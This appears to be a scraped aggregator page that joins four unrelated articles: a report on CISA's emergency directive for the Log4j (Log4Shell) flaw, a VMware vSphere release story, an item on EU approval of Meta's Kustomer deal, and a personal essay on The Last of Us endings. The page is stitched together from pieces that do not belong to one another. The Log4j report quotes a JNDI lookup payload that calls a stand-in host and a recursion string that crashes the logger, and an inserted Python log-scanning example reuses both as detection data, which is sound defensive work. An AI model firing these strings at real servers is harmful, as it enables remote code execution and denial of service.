CISA issues emergency directive to fix Log4j vulnerability • The Register

Voice Of EU

The US government’s Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021.

Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released a week ago, has since been bypassed.

The software library includes a text-formatting language that allows code execution and the vulnerability enables a remote attacker to craft a string like ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} to fetch the referenced object on the specified server and execute it.

The flaw, referred to as Log4Shell or Logjam, is rated Critical – with a CVSS score of 10.0 – and is already being actively exploited, hence the hullabaloo.

“Since Log4Shell is a critical flaw with a huge attack surface and is very simple to exploit, threat actors are actively using it to launch their attacks even with a patch already released,” said Felipe Tarijon, a malware analyst at AppGate, in an email to The Register. “Several state-sponsored groups are exploiting the flaw in the wild and making modifications to the Log4j exploit.”

Tarijon said botnets Muhstik and a Mirai-variant were abusing the flaw on Linux devices before public disclosure, and exploitation activities like the deployment of cryptocurrency miners have been observed. He added that a new ransomware family targeting Windows named Khonsari has been seen exploiting the Log4j vulnerability, which has also been used to deliver the Orcus Remote Access Trojan.

“This vulnerability, which is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use,” said CISA Director Jen Easterly in a statement last week. “End users will be reliant on their vendors, and the vendor community must immediately identify, mitigate, and patch the wide array of products using this software.”

CISA earlier this week published mitigation guidance directing federal civilian agencies to update Log4j to version 2.15 by December 24, 2021, to address CVE-2021-44228.

But on Wednesday that advice was superseded with the recommendation that affected entities update to version 2.16, released two days earlier, which addresses a mitigation bypass and a separately identified flaw, CVE-2021-45046, that allows an attacker to conduct a denial-of-service attack on affected devices via malicious payloads.

The emergency directive requires federal civilian agencies, by the end of the business day on December 23rd, to:
1) identify all systems that accept data over the internet;
2) check those systems against the CISA-managed GitHub repository;
3) apply the latest Log4j patch if appropriate, or take vulnerable systems offline;
4) submit a pull request identifying assets not referenced; and
5) assume that vulnerable systems have been compromised, with the post-incident investigation and mitigation that entails.

And by 5 pm EST on December 28, 2021, agencies are required to report systems they identified during this process and to detail whatever action was taken.

The fire drill, however, may not be over yet. The volunteer maintainers of Log4j have identified an infinite recursion bug, affecting versions up through 2.16, that apparently will crash the application if string substitution is attempted on this string pattern ${${::-${::-$${::-j}}}}.

As this article was filed, there’s not yet public agreement about whether this constitutes a meaningful denial-of-service attack risk or about whether a CVE will be sought for the issue. Stay tuned.
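As an added example (not code from the article, CISA or the Log4j project), a defender-side triage of constructed web-server log lines: it flags the `${jndi:...}` lookup form quoted above and the nested-lookup shape of the recursion pattern, first folding Log4j's `${::-x}` default-value syntax (the `${::-j}` fragment in that pattern) because a plain substring search for `${jndi:` does not see through it.

```python
import re

# Constructed sample log lines (user-agent field), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://127.0.0.1#evilhost.com:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}ndi:ldap://127.0.0.1:1389/a}"',
    '10.0.0.11 - - "GET / HTTP/1.1" 500 "${${::-${::-$${::-j}}}}"',
]

# Log4j's ${name:-default} syntax with an empty name evaluates to the
# default, so ${::-j} is just "j"; fold such fragments before matching.
DEFAULT_VALUE = re.compile(r"\$\{::-([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")


def normalize(line: str, max_rounds: int = 10) -> str:
    """Repeatedly replace ${::-x} with x until nothing changes."""
    for _ in range(max_rounds):
        folded = DEFAULT_VALUE.sub(r"\1", line)
        if folded == line:
            break
        line = folded
    return line


def triage(line: str) -> str:
    """Classify one log line: 'jndi_lookup', 'nested_lookup' or 'clean'."""
    folded = normalize(line)
    if JNDI_LOOKUP.search(folded):
        return "jndi_lookup"      # CVE-2021-44228 style lookup
    if NESTED_LOOKUP.search(folded):
        return "nested_lookup"    # shape of the 2.16 recursion crash string
    return "clean"


def scan(lines):
    """Return (line number, verdict) for every non-clean line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = triage(line)
        if verdict != "clean":
            hits.append((number, verdict))
    return hits


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Lines it flags are candidates for the "assume compromised" investigation the directive calls for, not proof of exploitation; the lookup only fires if the receiving application logged that field with a vulnerable Log4j.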

“The first patch (2.15) still has a vulnerability in non-default configurations allowing exfiltration of sensitive data,” said Tarijon in an email to The Register. “So, applying the latest patch by updating to 2.16 would be enough to fix the remote code execution (RCE) problem. It disables JNDI, the component abused to leverage the RCE.”

The recursion bug in version 2.16, he said, appears to be less critical because it can only be used for a denial of service attack that crashes the log system. Though the RCE bug has been patched in 2.16, he expects it will continue to have a significant impact because of the huge attack surface that depends upon vendors and third parties who may not apply patches quickly enough.

“As a reference, the PrintSpooler vulnerabilities in July of this year led to an RCE bug, patched by Microsoft, but subsequent exploits and variants appeared later as soon as threat actors started to abuse the vulnerability in the wild,” Tarijon explained.

In other words, expect to keep hearing about Log4j. ®

VMware fixes buggy vSphere release – and Log4J, too • The Register


VMware has restored availability of vSphere 7 Update, a release that it withdrew in late 2021 after driver dramas derailed deployments.

Paul Turner, Virtzilla’s veep for vSphere product management, told The Register that the source of the problem was Intel driver updates that arrived out of sync with VMware’s pre-release testing program. When users adopted the new drivers – one of which had been renamed – vSphere produced errors that meant virtual server fleet managers could not sustain high availability operations.

Turner said around 30,000 customers had adopted the release, of which around eight per cent encountered the issue. That collection of around 2,400 impacted users was enough for VMware to pull the release before the other 270,000 vSphere users hit trouble. That level of potential problems, Turner admitted, was considered a sufficient threshold to justify a do-over and the embarrassment of a pulled release.

VMware has since reviewed its testing program and procedures in the hope it will avoid a repeat of this error. Doing so, and repairing the release, meant a busier-than-usual holiday period for VMware developers. Turner said those who put in the extra hours will be compensated with extra time off in the future.

VMware also used the time needed to get the release ready to ensure that vSphere 7 U3 thoroughly addresses the Log4j bug. It took the opportunity to update to the latest version of the tool – which is free of the critical bug that allowed almost any code to execute without authorisation.

But VMware decided not to add anything new to vSphere while it addressed Log4j and sorted out the driver drama. Users will have to wait a few more months for another dose of VMware’s usual concoction of security updates and feature tweaks.

There’s more interesting stuff on the way, too. VMware has promised a full vSphere-as-a-Service offering is in the works, and the Project Capitola software-defined memory tech that will pool RAM across hosts. The company has also dropped hints that its plan to run its ESX hypervisor on SmartNICs is nearing release.

VMware has detailed the new/old release here and made downloads available here

Facebook given EU go-ahead to pursue controversial Kustomer acquisition


The EU’s antitrust chief Margrethe Vestager said she was satisfied for the company now known as Meta to pursue its Kustomer acquisition after it struck a deal for rivals.

Meta, the company formerly known as Facebook, has secured antitrust approval from the EU to pursue its acquisition of US customer services software start-up Kustomer.

The social media giant’s decision to acquire the start-up attracted EU scrutiny last April, months before its rebrand. Then known as Facebook, the company planned to integrate Kustomer’s products, including a chatbot, into its service.

Now, Meta has assured the European Commission that it will provide rivals free access to its messaging channels for 10 years.

The EU was satisfied that this addressed competition concerns which previously arose from the company’s decision to acquire Kustomer.

“Our decision today will ensure that innovative rivals and new entrants in the customer relationship management software market can effectively compete,” EU antitrust chief Margrethe Vestager said in a statement.

Last December, Vestager’s Digital Markets Act was passed by EU lawmakers as part of the body’s plans to rein in the monopoly large multinationals hold in Europe’s digital space.

Facebook had initially announced its acquisition plan in November 2020. In February 2021, the Irish Council for Civil Liberties wrote to the European Commission outlining its concerns over data that Kustomer had gathered and what might happen to that data under Facebook’s watch. The Commission also received a referral request from Austria flagging concerns over the Kustomer deal.

Other Meta acquisitions have also attracted the scrutiny of competition regulators. Last November, the UK ordered Meta to sell Giphy after its acquisition of the GIF making company was found to have breached competition rules. In the US, it is facing an antitrust suit that could force the company to sell WhatsApp and Instagram.

The EU’s decision to allow Meta to pursue the acquisition of Kustomer comes following a recent vote in the European Parliament in favour of the Digital Services Act, a companion of the Digital Markets Act. The act represents the EU’s attempt to shift the balance of power away from Big Tech in favour of ordinary people.

The long-debated act was hailed by Facebook whistleblower Frances Haugen as a “gold standard”.

Now that I’ve finally played The Last of Us, who wants to talk about that ending? | Games


“OK, Dad, this is an incredible essay on the effects of grief and grey morality in a postapocalyptic society,” says the eldest child, AKA the millennial. “It’s got proper female characters, progressive takes on sexuality and tonnes of rain.”

“They’ve made a video game of The Handmaid’s Tale?”

“No, Dad. It’s The Last of Us. Don’t worry. It’s still a zombie shooter. And both games have the best ending ever.”

Now she has my interest. Video game endings fascinate me, because my generation started out with arcade games that didn’t have them. Pac-Man kept eating dots and chasing ghosts and the Space Invaders kept coming, wave after incessant wave. The first arcade game that had an actual ending was Dragon’s Lair and nobody actually saw that because it was so hard to complete.

I have a tough start with The Last of Us because I hate games where you search for stuff in every room of a house. I spend my normal life doing that with car keys and headphones. I want games where you walk into a room and all the objects get sucked into a magic pocket. But that isn’t realistic, I hear you cry. Well, neither is only being able to carry three shivs in a world where, despite the zombie apocalypse, cargo pants clearly still exist.

Jaw-dropping … The Last of Us. Photograph: Sony

I also hate any form of crafting, because that was what my generation had to do for “fun” as kids before we had video games. Whether it’s smoke bombs from sugar and explosives or a set of Action Man drawers from matchboxes, it’s all boring to me.

“Keep going,” I tell myself. “The millennial says it’s got the best ending ever.”

Throughout the first chapter of Joel and Ellie’s jaunt across a post-infected US I keep trying to guess what this great ending will be. Maybe Ellie isn’t immune to infection after all? Maybe Joel is her real father? Maybe they’re both unwitting participants in some reality TV show, I’m Infected Get Me Out of Here?

As you will all know by now – and if you’ve yet to play The Last of Us then please stop reading – the ending has Joel murder a perfectly innocent and well-intentioned doctor who wants to cut Ellie open to find a cure that will save humanity. But Joel has no truck with utilitarian philosophy, because Ellie has now become a replacement for the daughter he lost. So, he disregards mankind’s future and, by stopping the operation, effectively murders the entire human race (alongside a whole hospital’s worth of doctors).

“Why does he do that?” I asked the millennial, in one of many fantastic discussions we had about the game.

“Because he’s a white male,” came the answer, because it’s 2022 and she’s in her 20s. And maybe she’s right. Either way it is a jaw-dropping, supremely brave ending and the terrific Left Behind side-story also brought the feels.

Grey morality … Ellie in The Last of Us Part 2. Photograph: Naughty Dog

So, when it came to The Last of Us Part 2, I was beyond excited. Fifty million hours later I was beyond disappointed.

Don’t get me wrong, the millennial nailed it when she said it was a great exploration of the effects of grief and grey morality. But after spending the whole game switching between two strong female characters (literally, have you seen Abby’s arms?) and contrasting factional creeds, you have the final confrontation. They fight. And … they both live. And go their separate ways. The only real damage is Ellie losing a couple of fingers, and the game portrays the worst consequence of this as not being able to play guitar any more. Seriously? That’s the biggest drawback to being fingerless in a zombie apocalypse? The first game ended with Joel murdering an entire civilisation, the second ends with Ellie murdering one song on a guitar. It’s a scene you might have found in The Secret of Monkey Island. It’s hilarious.

The Last of Us Part 2 leaves us with exactly the same non-ending as those original arcade games. Ellie and Abby will go on killing to keep their respective postapocalyptic factions going, both driven by the grief of murdered loved ones. They are both trapped, endlessly chasing ghosts. Sounds familiar…

The millennial says this shows there are no winners when it comes to revenge. I say they want both protagonists alive for The Last of Us 3. It’s a cynical cop out. But then, The Last of Us Part 2 is a game that features the most cynical scene ever, where apropos of nothing, after genuinely bravura portrayals of women, transgender and gay characters, alpha female Abby suddenly gets rogered from behind by some guy. It happens out of nowhere. The game spends umpteen hours portraying progressive sexuality, and then it’s like some marketing man decided they needed to toss the incels a piece of red meat to stop them hate-bombing all over 4chan (which didn’t work). It is easily the most gratuitous bit of nudity I have ever seen in games, and I have played The Witcher 3. The rogerer in question even has a girlfriend. Who is pregnant. Way to shit on a sister, Abby.

“It’s basically Pac-Man with gratuitous boobs,” I say to my eldest, who sighs and pours herself a large cup of coffee. This will be another long discussion.
